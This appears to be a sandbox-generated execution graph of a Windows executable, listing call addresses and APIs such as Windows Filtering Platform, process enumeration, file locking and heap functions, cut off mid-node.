                                    execution_graph 10122 7ff7e3cec3f0 10123 7ff7e3cec423 10122->10123 10124 7ff7e3cec417 10122->10124 10130 7ff7e3ceb4fe 10123->10130 10126 7ff7e3ceb420 5 API calls 10124->10126 10128 7ff7e3cec382 10124->10128 10126->10128 10127 7ff7e3ceca67 10128->10127 10129 7ff7e3ceb3e7 fputc 10128->10129 10129->10128 10131 7ff7e3ceb516 10130->10131 10132 7ff7e3ceb3e7 fputc 10131->10132 10134 7ff7e3ceb523 10131->10134 10132->10131 10133 7ff7e3ceb56e 10135 7ff7e3ceb58a 10133->10135 10137 7ff7e3ceb3e7 fputc 10133->10137 10134->10133 10136 7ff7e3ceb3e7 fputc 10134->10136 10135->10124 10136->10134 10137->10133 9529 7ff7e3cee0ee 9531 7ff7e3cedb86 9529->9531 9530 7ff7e3ceccd9 fputwc fwprintf 9530->9531 9531->9529 9531->9530 9532 7ff7e3cee2e0 9531->9532 9533 7ff7e3cee301 9532->9533 9535 7ff7e3ceccd9 9532->9535 9536 7ff7e3ceccf1 9535->9536 9537 7ff7e3cecd06 9536->9537 9539 7ff7e3cecd53 9536->9539 9538 7ff7e3cecd2a fwprintf 9537->9538 9543 7ff7e3cecd31 9537->9543 9538->9543 9541 7ff7e3cecd58 9539->9541 9546 7ff7e3ceca90 9539->9546 9542 7ff7e3cecdab 9541->9542 9544 7ff7e3ceca90 fputwc 9541->9544 9542->9543 9545 7ff7e3ceca90 fputwc 9542->9545 9543->9533 9544->9541 9545->9542 9547 7ff7e3cecaa1 9546->9547 9548 7ff7e3cecabc 9547->9548 9549 7ff7e3cecab2 fputwc 9547->9549 9548->9539 9549->9548 10138 7ff7e3cec7ec 10139 7ff7e3cec382 10138->10139 10140 7ff7e3ceca67 10139->10140 10141 7ff7e3ceb3e7 fputc 10139->10141 10141->10139 10921 7ff7e3cf05e9 RemoveDirectoryA 10938 7ff7e3ce65e3 10939 7ff7e3ce6684 10938->10939 10940 7ff7e3ce65f9 10938->10940 10941 7ff7e3ce14e2 6 API calls 10939->10941 10942 7ff7e3ce66b4 10940->10942 10943 7ff7e3ce6602 10940->10943 10950 7ff7e3ce66ad 10941->10950 10944 7ff7e3ce14e2 6 API calls 10942->10944 10945 7ff7e3ce66e4 10943->10945 10946 7ff7e3ce660e strlen 10943->10946 10944->10950 10947 7ff7e3ce14e2 6 API calls 10945->10947 10948 7ff7e3ce6620 10946->10948 10946->10950 10947->10950 10949 7ff7e3ce6640 strlen 10948->10949 10951 7ff7e3ce662f strlen 10948->10951 10957 7ff7e3ce743a 10949->10957 10955 7ff7e3ce14e2 6 API calls 10950->10955 10951->10949 10953 7ff7e3ce6656 strlen 10954 7ff7e3ce14e2 6 API calls 10953->10954 10956 7ff7e3ce667a 10954->10956 10955->10956 10958 7ff7e3ce7456 10957->10958 10958->10953 10142 7ff7e3cea3e1 10143 7ff7e3cea43e 10142->10143 10144 7ff7e3cea3f9 10142->10144 10147 7ff7e3ce14e2 6 API calls 10143->10147 10145 7ff7e3cea46e 10144->10145 10146 7ff7e3cea3fe 10144->10146 10148 7ff7e3ce14e2 6 API calls 10145->10148 10149 7ff7e3ce9ed0 8 API calls 10146->10149 10154 7ff7e3cea41b 10147->10154 10148->10154 10150 7ff7e3cea411 10149->10150 10151 7ff7e3cea4a1 strlen GetProcessHeap HeapAlloc 10150->10151 10150->10154 10152 7ff7e3cea4d3 10151->10152 10153 7ff7e3cea52d 10151->10153 10152->10154 10155 7ff7e3cea4db strlen 10152->10155 10156 7ff7e3ce14e2 6 API calls 10153->10156 10160 7ff7e3ce6e61 10155->10160 10156->10152 10159 7ff7e3cea511 GetProcessHeap HeapFree 10159->10154 10161 7ff7e3ce6e93 10160->10161 10162 7ff7e3ce6e71 10160->10162 10165 7ff7e3ce14e2 6 API calls 10161->10165 10163 7ff7e3ce6ec6 10162->10163 10164 7ff7e3ce6e76 10162->10164 10167 7ff7e3ce14e2 6 API calls 10163->10167 10166 7ff7e3ce6ef9 10164->10166 10169 7ff7e3ce6e7c 10164->10169 10171 7ff7e3ce6e85 10165->10171 10168 7ff7e3ce14e2 6 API calls 10166->10168 10167->10171 10168->10171 10170 7ff7e3ce14e2 6 API calls 10169->10170 10169->10171 10170->10171 10171->10154 10171->10159 10172 7ff7e3ceafe1 strlen 10173 7ff7e3ceb043 10172->10173 10174 7ff7e3ceaff9 10172->10174 10174->10173 10175 7ff7e3ceb026 strncmp 10174->10175 10175->10173 10175->10174 10459 7ff7e3cf06e1 FreeLibrary 9564 7ff7e3cedcdd strerror 9571 7ff7e3cecfc8 9564->9571 9572 7ff7e3cecfd8 9571->9572 9573 7ff7e3cecff6 strlen 9572->9573 9574 7ff7e3cecfef 9572->9574 9573->9574 10176 7ff7e3cec3dc 10177 7ff7e3ceb3e7 fputc 10176->10177 10180 7ff7e3cec382 10177->10180 10178 7ff7e3ceca67 10179 7ff7e3ceb3e7 fputc 10179->10180 10180->10178 10180->10179 10975 7ff7e3ce89d9 10976 7ff7e3ce8a13 CloseHandle 10975->10976 10985 7ff7e3ce860e 10976->10985 10977 7ff7e3ce8669 Process32Next 10979 7ff7e3ce867d GetLastError 10977->10979 10977->10985 10978 7ff7e3ce8ca5 CloseHandle 10980 7ff7e3ce8cb5 10978->10980 10979->10985 10981 7ff7e3cea1f1 11 API calls 10981->10985 10982 7ff7e3ce88cd OpenProcess 10983 7ff7e3ce88ee QueryFullProcessImageNameW 10982->10983 10984 7ff7e3ce8a78 GetLastError 10982->10984 10983->10985 10986 7ff7e3ce892e GetLastError 10983->10986 10987 7ff7e3ce14e2 6 API calls 10984->10987 10985->10976 10985->10977 10985->10978 10985->10981 10985->10982 10989 7ff7e3ce8153 29 API calls 10985->10989 10990 7ff7e3ce14e2 6 API calls 10985->10990 10988 7ff7e3ce14e2 6 API calls 10986->10988 10987->10985 10988->10985 10989->10985 10990->10985 10991 7ff7e3cf05d9 SetUnhandledExceptionFilter 10469 7ff7e3cf02d7 10470 7ff7e3cf02f6 10469->10470 10471 7ff7e3cf02fd ___lc_codepage_func ___mb_cur_max_func 10469->10471 10470->10471 10472 7ff7e3cf0318 10471->10472 10477 7ff7e3cf0358 10471->10477 10473 7ff7e3cf0323 10472->10473 10476 7ff7e3cf0361 10472->10476 10472->10477 10475 7ff7e3cf0150 4 API calls 10473->10475 10473->10477 10474 7ff7e3cf0150 4 API calls 10474->10476 10475->10473 10476->10474 10476->10477 10992 7ff7e3ceadd8 10993 7ff7e3ceadf3 10992->10993 10994 7ff7e3ceae3e 10992->10994 10993->10994 10995 7ff7e3ceae0d EnterCriticalSection LeaveCriticalSection 10993->10995 10995->10994 10487 7ff7e3cf0711 EnterCriticalSection 9597 7ff7e3cead0e 9598 7ff7e3cead13 signal 9597->9598 9599 7ff7e3cead25 signal 9598->9599 9600 7ff7e3ceaca1 9598->9600 9599->9600 10190 7ff7e3cedc0b 10191 7ff7e3ceccd9 2 API calls 10190->10191 10195 7ff7e3cedb86 10191->10195 10192 7ff7e3cee2e0 10193 7ff7e3cee301 10192->10193 10194 7ff7e3ceccd9 2 API calls 10192->10194 10194->10193 10195->10192 10196 7ff7e3ceccd9 fputwc fwprintf 10195->10196 10196->10195 10197 7ff7e3ce1001 10199 7ff7e3ce103c __set_app_type 10197->10199 10200 7ff7e3ce10a9 10199->10200 11009 7ff7e3cec600 11010 7ff7e3cec616 11009->11010 11015 7ff7e3cec1ae 11010->11015 11012 7ff7e3ceca67 11013 7ff7e3cec382 11013->11012 11014 7ff7e3ceb3e7 fputc 11013->11014 11014->11013 11016 7ff7e3cec1c0 11015->11016 11033 7ff7e3ceb2d0 11016->11033 11019 7ff7e3cec21f 11022 7ff7e3cec290 11019->11022 11026 7ff7e3cec235 11019->11026 11020 7ff7e3cec20d 11021 7ff7e3ceb5da fputc 11020->11021 11025 7ff7e3cec21a 11021->11025 11023 7ff7e3cec294 11022->11023 11024 7ff7e3cec29b strlen 11022->11024 11057 7ff7e3cec08a 11023->11057 11024->11023 11025->11013 11027 7ff7e3cec241 strlen 11026->11027 11029 7ff7e3cec239 11026->11029 11027->11029 11037 7ff7e3ceb721 11029->11037 11031 7ff7e3cec274 11031->11025 11032 7ff7e3ceb3e7 fputc 11031->11032 11032->11031 11034 7ff7e3ceb2ee 11033->11034 11035 7ff7e3cee4e0 6 API calls 11034->11035 11036 7ff7e3ceb3e1 11035->11036 11036->11019 11036->11020 11039 7ff7e3ceb73d 11037->11039 11038 7ff7e3ceb78e 11040 7ff7e3ceb3e7 fputc 11038->11040 11045 7ff7e3ceb82b 11038->11045 11039->11038 11041 7ff7e3ceb3e7 fputc 11039->11041 11040->11045 11041->11039 11042 7ff7e3ceb831 11043 7ff7e3ceb867 11042->11043 11044 7ff7e3ceb83a 11042->11044 11047 7ff7e3ceb3e7 fputc 11043->11047 11049 7ff7e3ceb8bc 11043->11049 11054 7ff7e3ceb420 5 API calls 11043->11054 11048 7ff7e3ceb3e7 fputc 11044->11048 11045->11042 11046 7ff7e3ceb3e7 fputc 11045->11046 11046->11045 11047->11043 11048->11049 11050 7ff7e3ceb64c 11 API calls 11049->11050 11055 7ff7e3ceb8d0 11049->11055 11050->11055 11051 7ff7e3ceb8e8 11052 7ff7e3ceb910 11051->11052 11056 7ff7e3ceb3e7 fputc 11051->11056 11052->11031 11053 7ff7e3ceb3e7 fputc 11053->11055 11054->11043 11055->11051 11055->11053 11056->11051 11058 7ff7e3cec0ac 11057->11058 11059 7ff7e3ceb721 11 API calls 11058->11059 11060 7ff7e3cec0f7 11059->11060 11061 7ff7e3ceb3e7 fputc 11060->11061 11062 7ff7e3cec118 11061->11062 8939 7ff7e3ce12fd 8942 7ff7e3ce1131 8939->8942 8943 7ff7e3ce115a 8942->8943 8944 7ff7e3ce1172 8943->8944 8945 7ff7e3ce1169 Sleep 8943->8945 8946 7ff7e3ce1194 8944->8946 8947 7ff7e3ce1188 _amsg_exit 8944->8947 8945->8943 8948 7ff7e3ce11b5 8946->8948 8949 7ff7e3ce119a _initterm 8946->8949 8947->8948 8950 7ff7e3ce11c5 _initterm 8948->8950 8951 7ff7e3ce11de 8948->8951 8949->8948 8950->8951 8963 7ff7e3cea96b 8951->8963 8954 7ff7e3ce122e 8955 7ff7e3ce1233 malloc 8954->8955 8956 7ff7e3ce1253 8955->8956 8957 7ff7e3ce1283 8956->8957 8958 7ff7e3ce1258 strlen malloc 8956->8958 8974 7ff7e3ce14b8 8957->8974 8958->8956 8960 7ff7e3ce12c4 8961 7ff7e3ce12e3 _cexit 8960->8961 8962 7ff7e3ce12e8 8960->8962 8961->8962 8964 7ff7e3ce1208 SetUnhandledExceptionFilter 8963->8964 8966 7ff7e3cea989 8963->8966 8964->8954 8965 7ff7e3ceab8f 8965->8964 8968 7ff7e3ceabb7 VirtualProtect 8965->8968 8966->8965 8967 7ff7e3ceaa00 8966->8967 8971 7ff7e3ceaa3f 8966->8971 8967->8965 8969 7ff7e3ceaa1e 8967->8969 8968->8965 8969->8967 8978 7ff7e3cea824 8969->8978 8971->8965 8973 7ff7e3ceaaaa 8971->8973 8972 7ff7e3cea824 3 API calls 8972->8971 8973->8972 8975 7ff7e3ce14c8 8974->8975 8985 7ff7e3ce1486 8975->8985 8980 7ff7e3cea84a 8978->8980 8979 7ff7e3cea953 8979->8969 8980->8979 8981 7ff7e3cea8af VirtualQuery 8980->8981 8982 7ff7e3cea8d8 8981->8982 8982->8979 8983 7ff7e3cea907 VirtualProtect 8982->8983 8983->8979 8984 7ff7e3cea93f GetLastError 8983->8984 8984->8979 8992 7ff7e3ce1360 8985->8992 8988 7ff7e3ce1496 9011 7ff7e3ce1432 8988->9011 9042 7ff7e3ce19c0 GetModuleHandleExA 8992->9042 8997 7ff7e3ce1393 9057 7ff7e3ce168c InitializeCriticalSectionAndSpinCount 8997->9057 9001 7ff7e3ce19c0 8 API calls 9002 7ff7e3ce13cb 9001->9002 9003 7ff7e3ce6c99 12 API calls 9002->9003 9004 7ff7e3ce13e7 9003->9004 9104 7ff7e3ce6497 9004->9104 9007 7ff7e3ce13f6 9010 7ff7e3ce13a1 9007->9010 9110 7ff7e3ce97f2 9007->9110 9010->8988 9019 7ff7e3ce9621 9010->9019 9263 7ff7e3ce193c 9011->9263 9014 7ff7e3ce1446 9270 7ff7e3ce6263 9014->9270 9015 7ff7e3ce1452 9017 7ff7e3ce1475 9015->9017 9018 7ff7e3ce145e GetProcessHeap HeapFree 9015->9018 9017->8960 9018->9017 9020 7ff7e3ce9650 9019->9020 9021 7ff7e3ce9656 9020->9021 9022 7ff7e3ce96b0 9020->9022 9284 7ff7e3ce76d0 9021->9284 9023 7ff7e3ce14e2 6 API calls 9022->9023 9025 7ff7e3ce96c6 9023->9025 9025->8988 9027 7ff7e3ce966e 9030 7ff7e3ce9d2d 7 API calls 9027->9030 9041 7ff7e3ce9672 9027->9041 9028 7ff7e3ce76d0 8 API calls 9028->9027 9029 7ff7e3ce96fc FwpmEngineClose0 9029->9025 9032 7ff7e3ce96ef 9030->9032 9032->9029 9033 7ff7e3ce9722 9032->9033 9308 7ff7e3ce855d 9032->9308 9033->9029 9036 7ff7e3ce9d2d 7 API calls 9033->9036 9035 7ff7e3ce96ac 9035->9029 9038 7ff7e3ce9737 9036->9038 9038->9029 9038->9041 9334 7ff7e3ce8cfc 9038->9334 9041->9029 9298 7ff7e3ce9d2d 9041->9298 9043 7ff7e3ce19f2 GetLastError 9042->9043 9044 7ff7e3ce1376 9042->9044 9158 7ff7e3ce14e2 9043->9158 9046 7ff7e3ce6c99 9044->9046 9047 7ff7e3ce6cdf 9046->9047 9048 7ff7e3ce6caf 9046->9048 9049 7ff7e3ce14e2 6 API calls 9047->9049 9179 7ff7e3ce6b9b 9048->9179 9056 7ff7e3ce138f 9049->9056 9052 7ff7e3ce6d0f strlen 9053 7ff7e3ce6d21 9052->9053 9054 7ff7e3ce6d37 strcat strlen 9052->9054 9053->9054 9055 7ff7e3ce6d26 strlen 9053->9055 9054->9056 9055->9054 9056->8997 9081 7ff7e3ce5e6f 9056->9081 9058 7ff7e3ce17e0 GetLastError 9057->9058 9059 7ff7e3ce16ba 9057->9059 9060 7ff7e3ce14e2 6 API calls 9058->9060 9061 7ff7e3ce19c0 8 API calls 9059->9061 9067 7ff7e3ce17b9 9060->9067 9062 7ff7e3ce16d6 9061->9062 9063 7ff7e3ce6b9b 8 API calls 9062->9063 9064 7ff7e3ce16ea 9063->9064 9065 7ff7e3ce16f4 strlen 9064->9065 9064->9067 9068 7ff7e3ce1723 9065->9068 9069 7ff7e3ce170d 9065->9069 9066 7ff7e3ce14e2 6 API calls 9070 7ff7e3ce139d 9066->9070 9067->9066 9072 7ff7e3ce1748 strlen fopen 9068->9072 9073 7ff7e3ce1728 strcat strlen 9068->9073 9069->9068 9071 7ff7e3ce1712 strlen 9069->9071 9070->9001 9070->9010 9071->9068 9074 7ff7e3ce18ad 9072->9074 9075 7ff7e3ce1797 9072->9075 9073->9072 9077 7ff7e3ce14e2 6 API calls 9074->9077 9076 7ff7e3ce14e2 6 API calls 9075->9076 9078 7ff7e3ce17b1 9076->9078 9077->9067 9078->9067 9079 7ff7e3ce191d 9078->9079 9080 7ff7e3ce14e2 6 API calls 9079->9080 9080->9070 9082 7ff7e3ce5e86 9081->9082 9083 7ff7e3ce5f72 9081->9083 9085 7ff7e3ce5e8f CreateFileA 9082->9085 9086 7ff7e3ce5fa2 9082->9086 9084 7ff7e3ce14e2 6 API calls 9083->9084 9090 7ff7e3ce5f27 9084->9090 9088 7ff7e3ce5fd5 GetLastError 9085->9088 9089 7ff7e3ce5eda LockFileEx 9085->9089 9087 7ff7e3ce14e2 6 API calls 9086->9087 9087->9090 9091 7ff7e3ce14e2 6 API calls 9088->9091 9092 7ff7e3ce5f0e 9089->9092 9093 7ff7e3ce60ba GetLastError 9089->9093 9096 7ff7e3ce5f51 9090->9096 9097 7ff7e3ce6239 9090->9097 9101 7ff7e3ce5ff6 9091->9101 9092->9090 9095 7ff7e3ce622b CloseHandle 9092->9095 9094 7ff7e3ce14e2 6 API calls 9093->9094 9102 7ff7e3ce60db 9094->9102 9095->9097 9098 7ff7e3ce14e2 6 API calls 9096->9098 9099 7ff7e3ce14e2 6 API calls 9097->9099 9100 7ff7e3ce5f67 9098->9100 9099->9100 9100->8997 9101->9093 9103 7ff7e3ce6123 9101->9103 9102->9103 9103->9095 9103->9102 9105 7ff7e3ce64b5 9104->9105 9106 7ff7e3ce64a0 GetFileAttributesA 9104->9106 9107 7ff7e3ce14e2 6 API calls 9105->9107 9108 7ff7e3ce64e5 GetLastError 9106->9108 9109 7ff7e3ce13ef 9106->9109 9107->9109 9108->9109 9109->9007 9132 7ff7e3ce433b 9109->9132 9111 7ff7e3ce98a5 9110->9111 9112 7ff7e3ce981a 9110->9112 9113 7ff7e3ce14e2 6 API calls 9111->9113 9207 7ff7e3ce45d5 9112->9207 9127 7ff7e3ce9833 9113->9127 9115 7ff7e3ce9854 9117 7ff7e3ce9b92 9115->9117 9121 7ff7e3ce987c 9115->9121 9116 7ff7e3ce983d GetProcessHeap HeapFree 9116->9115 9118 7ff7e3ce14e2 6 API calls 9117->9118 9120 7ff7e3ce9bb4 9118->9120 9119 7ff7e3ce995d GetProcessHeap HeapAlloc 9122 7ff7e3ce99d0 9119->9122 9128 7ff7e3ce999a 9119->9128 9131 7ff7e3ce14e2 6 API calls 9120->9131 9123 7ff7e3ce14e2 6 API calls 9121->9123 9125 7ff7e3ce14e2 6 API calls 9122->9125 9126 7ff7e3ce9892 9123->9126 9125->9128 9126->9010 9127->9115 9127->9116 9128->9127 9129 7ff7e3ce9ab3 strncpy strncpy 9128->9129 9130 7ff7e3ce9b28 strncpy 9128->9130 9129->9128 9130->9128 9131->9120 9133 7ff7e3ce43e5 9132->9133 9134 7ff7e3ce435a 9132->9134 9135 7ff7e3ce14e2 6 API calls 9133->9135 9136 7ff7e3ce4363 fopen 9134->9136 9137 7ff7e3ce4415 9134->9137 9142 7ff7e3ce4388 9135->9142 9138 7ff7e3ce4374 9136->9138 9139 7ff7e3ce4448 _errno 9136->9139 9140 7ff7e3ce14e2 6 API calls 9137->9140 9141 7ff7e3ce44d6 fwrite 9138->9141 9138->9142 9143 7ff7e3ce14e2 6 API calls 9139->9143 9140->9142 9146 7ff7e3ce44ee 9141->9146 9147 7ff7e3ce44f8 _errno 9141->9147 9145 7ff7e3ce459a 9142->9145 9150 7ff7e3ce43bb 9142->9150 9144 7ff7e3ce4470 _errno 9143->9144 9148 7ff7e3ce44bd _errno 9144->9148 9149 7ff7e3ce4479 9144->9149 9152 7ff7e3ce14e2 6 API calls 9145->9152 9146->9147 9151 7ff7e3ce14e2 6 API calls 9147->9151 9148->9141 9149->9148 9153 7ff7e3ce14e2 6 API calls 9150->9153 9154 7ff7e3ce4520 _errno 9151->9154 9155 7ff7e3ce43d8 9152->9155 9153->9155 9156 7ff7e3ce456d _errno 9154->9156 9157 7ff7e3ce4529 9154->9157 9155->9007 9156->9145 9157->9156 9159 7ff7e3ce14f0 9158->9159 9169 7ff7e3ceb210 9159->9169 9162 7ff7e3ce15ac EnterCriticalSection 9165 7ff7e3ce15c6 LeaveCriticalSection 9162->9165 9166 7ff7e3ce15e3 9162->9166 9163 7ff7e3ce1577 fwrite fflush 9164 7ff7e3ce15a0 9163->9164 9164->9044 9165->9163 9167 7ff7e3ce161d CopyFileA 9166->9167 9168 7ff7e3ce1655 9167->9168 9168->9165 9170 7ff7e3ceb235 9169->9170 9171 7ff7e3ceb21e 9169->9171 9173 7ff7e3cec2d0 fputc 9170->9173 9175 7ff7e3cec2d0 9171->9175 9174 7ff7e3ce1549 9173->9174 9174->9162 9174->9163 9174->9164 9177 7ff7e3cec307 9175->9177 9176 7ff7e3ceca67 9176->9174 9177->9176 9178 7ff7e3ceb3e7 fputc 9177->9178 9178->9177 9180 7ff7e3ce6be2 9179->9180 9181 7ff7e3ce6bac 9179->9181 9182 7ff7e3ce14e2 6 API calls 9180->9182 9183 7ff7e3ce6c12 9181->9183 9184 7ff7e3ce6bb1 9181->9184 9190 7ff7e3ce6bc7 9182->9190 9185 7ff7e3ce14e2 6 API calls 9183->9185 9186 7ff7e3ce6c42 9184->9186 9187 7ff7e3ce6bba 9184->9187 9185->9190 9189 7ff7e3ce14e2 6 API calls 9186->9189 9192 7ff7e3ce6a5c 9187->9192 9189->9190 9190->9052 9190->9056 9193 7ff7e3ce6a76 9192->9193 9194 7ff7e3ce6b05 9192->9194 9196 7ff7e3ce6b35 9193->9196 9197 7ff7e3ce6a7f 9193->9197 9195 7ff7e3ce14e2 6 API calls 9194->9195 9201 7ff7e3ce6ac1 9195->9201 9198 7ff7e3ce14e2 6 API calls 9196->9198 9199 7ff7e3ce6b68 9197->9199 9200 7ff7e3ce6a88 GetModuleFileNameA GetLastError 9197->9200 9198->9201 9203 7ff7e3ce14e2 6 API calls 9199->9203 9202 7ff7e3ce6aa2 9200->9202 9206 7ff7e3ce14e2 6 API calls 9201->9206 9204 7ff7e3ce6afa 9202->9204 9205 7ff7e3ce14e2 6 API calls 9202->9205 9203->9201 9204->9190 9205->9201 9206->9204 9208 7ff7e3ce4675 9207->9208 9209 7ff7e3ce45f7 9207->9209 9212 7ff7e3ce14e2 6 API calls 9208->9212 9210 7ff7e3ce4600 9209->9210 9211 7ff7e3ce46ba 9209->9211 9213 7ff7e3ce4610 fopen 9210->9213 9215 7ff7e3ce46ed 9210->9215 9214 7ff7e3ce14e2 6 API calls 9211->9214 9222 7ff7e3ce46b0 9212->9222 9216 7ff7e3ce4720 _errno 9213->9216 9217 7ff7e3ce462b fseek 9213->9217 9214->9222 9218 7ff7e3ce14e2 6 API calls 9215->9218 9219 7ff7e3ce14e2 6 API calls 9216->9219 9220 7ff7e3ce47f3 9217->9220 9221 7ff7e3ce4646 _errno 9217->9221 9218->9222 9223 7ff7e3ce4742 _errno 9219->9223 9231 7ff7e3ce4802 9220->9231 9232 7ff7e3ce482b _errno 9220->9232 9224 7ff7e3ce14e2 6 API calls 9221->9224 9225 7ff7e3ce14e2 6 API calls 9222->9225 9226 7ff7e3ce478f _errno 9223->9226 9227 7ff7e3ce474b 9223->9227 9228 7ff7e3ce4668 _errno 9224->9228 9229 7ff7e3ce4b78 9225->9229 9236 7ff7e3ce481e 9226->9236 9227->9226 9228->9208 9230 7ff7e3ce47da _errno 9228->9230 9229->9119 9229->9127 9230->9236 9231->9236 9239 7ff7e3ce48b3 fseek 9231->9239 9233 7ff7e3ce14e2 6 API calls 9232->9233 9238 7ff7e3ce484d _errno 9233->9238 9234 7ff7e3ce4b35 9234->9222 9237 7ff7e3ce4ba2 9234->9237 9235 7ff7e3ce4b2d fclose 9235->9234 9236->9234 9236->9235 9244 7ff7e3ce14e2 6 API calls 9237->9244 9240 7ff7e3ce4856 9238->9240 9241 7ff7e3ce489a _errno 9238->9241 9242 7ff7e3ce4941 _errno 9239->9242 9243 7ff7e3ce48cd 9239->9243 9240->9241 9241->9236 9245 7ff7e3ce14e2 6 API calls 9242->9245 9246 7ff7e3ce48df 9243->9246 9247 7ff7e3ce49c9 GetProcessHeap HeapAlloc 9243->9247 9244->9229 9248 7ff7e3ce4963 _errno 9245->9248 9246->9236 9254 7ff7e3ce4a9e 9246->9254 9255 7ff7e3ce490d fread 9246->9255 9259 7ff7e3ce4a0c _errno 9246->9259 9262 7ff7e3ce4a7b _errno 9246->9262 9247->9246 9249 7ff7e3ce49f1 9247->9249 9250 7ff7e3ce49b0 _errno 9248->9250 9251 7ff7e3ce496c 9248->9251 9252 7ff7e3ce14e2 6 API calls 9249->9252 9250->9236 9251->9250 9253 7ff7e3ce4a07 9252->9253 9253->9246 9256 7ff7e3ce14e2 6 API calls 9254->9256 9258 7ff7e3ce4aa9 9254->9258 9255->9246 9255->9254 9256->9258 9257 7ff7e3ce4ab4 GetProcessHeap HeapFree 9257->9236 9258->9236 9258->9257 9260 7ff7e3ce14e2 6 API calls 9259->9260 9261 7ff7e3ce4a2e _errno 9260->9261 9261->9246 9261->9262 9262->9246 9264 7ff7e3ce1956 fclose 9263->9264 9265 7ff7e3ce195b 9263->9265 9264->9265 9266 7ff7e3ce1983 DeleteCriticalSection 9265->9266 9267 7ff7e3ce1989 9265->9267 9266->9267 9268 7ff7e3ce14e2 6 API calls 9267->9268 9269 7ff7e3ce143c 9268->9269 9269->9014 9269->9015 9271 7ff7e3ce62e4 9270->9271 9272 7ff7e3ce6272 9270->9272 9275 7ff7e3ce14e2 6 API calls 9271->9275 9273 7ff7e3ce6315 9272->9273 9274 7ff7e3ce627f UnlockFileEx 9272->9274 9276 7ff7e3ce14e2 6 API calls 9273->9276 9277 7ff7e3ce6372 GetLastError 9274->9277 9278 7ff7e3ce62b9 CloseHandle 9274->9278 9283 7ff7e3ce630d 9275->9283 9276->9283 9279 7ff7e3ce14e2 6 API calls 9277->9279 9280 7ff7e3ce14e2 6 API calls 9278->9280 9279->9283 9281 7ff7e3ce62d8 9280->9281 9281->9015 9282 7ff7e3ce14e2 6 API calls 9282->9281 9283->9282 9285 7ff7e3ce7785 9284->9285 9286 7ff7e3ce77cd 9285->9286 9287 7ff7e3ce7789 9285->9287 9288 7ff7e3ce14e2 6 API calls 9286->9288 9289 7ff7e3ce77ea 9287->9289 9294 7ff7e3ce77c6 9287->9294 9295 7ff7e3ce77e3 9288->9295 9290 7ff7e3ce14e2 6 API calls 9289->9290 9293 7ff7e3ce7800 9290->9293 9291 7ff7e3ce7817 FwpmProviderDestroyEnumHandle0 9291->9295 9296 7ff7e3ce788a 9291->9296 9292 7ff7e3ce7865 wcscmp 9292->9294 9293->9291 9294->9292 9294->9293 9295->9027 9295->9028 9296->9295 9297 7ff7e3ce14e2 6 API calls 9296->9297 9297->9295 9360 7ff7e3ce9bb9 9298->9360 9301 7ff7e3ce9537 9302 7ff7e3ce9bb9 7 API calls 9301->9302 9305 7ff7e3ce9566 9302->9305 9303 7ff7e3ce960d 9303->9035 9305->9303 9307 7ff7e3ce14e2 6 API calls 9305->9307 9377 7ff7e3cea1f1 9305->9377 9383 7ff7e3ce929a inet_addr ntohl 9305->9383 9307->9305 9309 7ff7e3ce9bb9 7 API calls 9308->9309 9310 7ff7e3ce8599 9309->9310 9311 7ff7e3ce86c1 GetLastError 9310->9311 9312 7ff7e3ce85dc 9310->9312 9318 7ff7e3ce86df 9310->9318 9313 7ff7e3ce14e2 6 API calls 9311->9313 9314 7ff7e3ce87a3 GetLastError 9312->9314 9333 7ff7e3ce860e 9312->9333 9313->9318 9316 7ff7e3ce87b4 9314->9316 9314->9333 9315 7ff7e3ce8ca5 CloseHandle 9315->9318 9317 7ff7e3ce14e2 6 API calls 9316->9317 9317->9333 9318->9033 9319 7ff7e3cea1f1 11 API calls 9319->9333 9320 7ff7e3ce88cd OpenProcess 9321 7ff7e3ce88ee QueryFullProcessImageNameW 9320->9321 9322 7ff7e3ce8a78 GetLastError 9320->9322 9324 7ff7e3ce892e GetLastError 9321->9324 9321->9333 9325 7ff7e3ce14e2 6 API calls 9322->9325 9323 7ff7e3ce8669 Process32Next 9326 7ff7e3ce867d GetLastError 9323->9326 9323->9333 9327 7ff7e3ce14e2 6 API calls 9324->9327 9325->9333 9326->9333 9327->9333 9329 7ff7e3ce14e2 6 API calls 9329->9333 9330 7ff7e3ce8a13 CloseHandle 9330->9333 9331 7ff7e3ce86af 9331->9330 9332 7ff7e3ce14e2 6 API calls 9331->9332 9332->9331 9333->9315 9333->9319 9333->9320 9333->9323 9333->9329 9333->9330 9333->9331 9427 7ff7e3ce8153 9333->9427 9335 7ff7e3ce9bb9 7 API calls 9334->9335 9336 7ff7e3ce8d38 9335->9336 9345 7ff7e3ce9257 9336->9345 9490 7ff7e3ce1cf4 9336->9490 9339 7ff7e3ce8d82 9341 7ff7e3ce8d8a 9339->9341 9343 7ff7e3ce1c73 8 API calls 9339->9343 9342 7ff7e3ce8da9 FreeLibrary 9341->9342 9341->9345 9342->9345 9344 7ff7e3ce8dc6 9343->9344 9344->9345 9346 7ff7e3ce1c73 8 API calls 9344->9346 9345->9041 9347 7ff7e3ce8de3 9346->9347 9347->9345 9348 7ff7e3ce1c73 8 API calls 9347->9348 9349 7ff7e3ce8e00 9348->9349 9349->9345 9350 7ff7e3ce1c73 8 API calls 9349->9350 9358 7ff7e3ce8e18 9350->9358 9351 7ff7e3cea1f1 11 API calls 9351->9358 9352 7ff7e3ce8ecc strlen 9352->9358 9353 7ff7e3ce8f64 GetProcessHeap HeapAlloc 9353->9358 9354 7ff7e3ce14e2 6 API calls 9354->9358 9355 7ff7e3ce8fb2 BuildTrusteeWithSidW BuildSecurityDescriptorW 9355->9358 9357 7ff7e3ce90f2 GetProcessHeap HeapFree 9357->9358 9358->9341 9358->9345 9358->9351 9358->9352 9358->9353 9358->9354 9358->9355 9358->9357 9359 7ff7e3ce91dc LocalFree 9358->9359 9506 7ff7e3ce795a GetProcessHeap HeapAlloc 9358->9506 9359->9358 9361 7ff7e3ce9bd1 9360->9361 9362 7ff7e3ce9bec 9360->9362 9363 7ff7e3ce9bd6 9361->9363 9364 7ff7e3ce9c1f 9361->9364 9365 7ff7e3ce14e2 6 API calls 9362->9365 9366 7ff7e3ce9c52 9363->9366 9367 7ff7e3ce9bdb 9363->9367 9368 7ff7e3ce14e2 6 API calls 9364->9368 9373 7ff7e3ce9c15 9365->9373 9369 7ff7e3ce14e2 6 API calls 9366->9369 9370 7ff7e3ce9cbc 9367->9370 9371 7ff7e3ce9c91 strcmp 9367->9371 9368->9373 9369->9373 9372 7ff7e3ce9cc3 9370->9372 9370->9373 9371->9367 9374 7ff7e3ce14e2 6 API calls 9372->9374 9375 7ff7e3ce14e2 6 API calls 9373->9375 9376 7ff7e3ce9689 